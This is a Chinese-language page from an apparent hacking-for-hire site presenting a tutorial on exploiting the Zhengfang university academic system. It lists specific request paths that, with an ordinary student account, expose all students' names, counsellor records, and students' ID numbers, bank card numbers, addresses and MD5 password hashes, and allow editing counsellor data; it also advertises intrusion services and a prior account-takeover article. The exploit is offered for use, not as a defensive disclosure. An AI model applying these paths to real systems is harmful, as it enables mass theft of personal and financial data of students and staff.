网站入侵

网站入侵,入侵渗透,怎么样入侵网站,黑客怎么拿站,黑客接单

正方教务系统漏洞利用-老师敏感信息查询

                       

黑客19 – 引领实战潮流,回归技术本质,以行动推动行业技术进步
唯一的联系方式[email protected] 和 [email protected]
欢迎转载,但请注明原始链接,谢谢!

在访问各路径的过程中,我已经发现该系统并未对do严格过滤后缀路径,导致许多不应访问的页面可以在低权限下访问,如新闻删除、活动审查等。在进一步搜索相关方法后,我发现了几条敏感的路径:

/xgxt/xsxx_xsgl.do?method=showStudentsAjax&isAll=true:查看所有学生名单

/xgxt/general_szdw.do?method=szdwRybb&lx=fdy:可以查看辅导员的所有信息

/xgxt/xsxx_xsgl.do?method=getXsjbxxMore&xh=:查看学生的所有敏感信息(包括身份证号码、银行卡号码、地址和系统)MD5密码等)

/xgxt/szdw_fdyxx.do?method=fdyxxEdit(View)&zgh= 可查看或修改辅导员信息:

到目前为止,我们可以获得全校师生的敏感信息,只需要一个普通的学生账户,所以问题来了,如何获得账户? 请参考我们以前的文章

通过校园网入侵强智教务系统

这个渗透教程到此结束!希望大家看看借鉴。如果您有技术咨询,请联系我们
黑客19引领实战潮流,回归技术本质,以行动推动行业技术进步
唯一的联系方式[email protected] 和 [email protected]
欢迎转载,但请注明原始链接,谢谢!

       

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.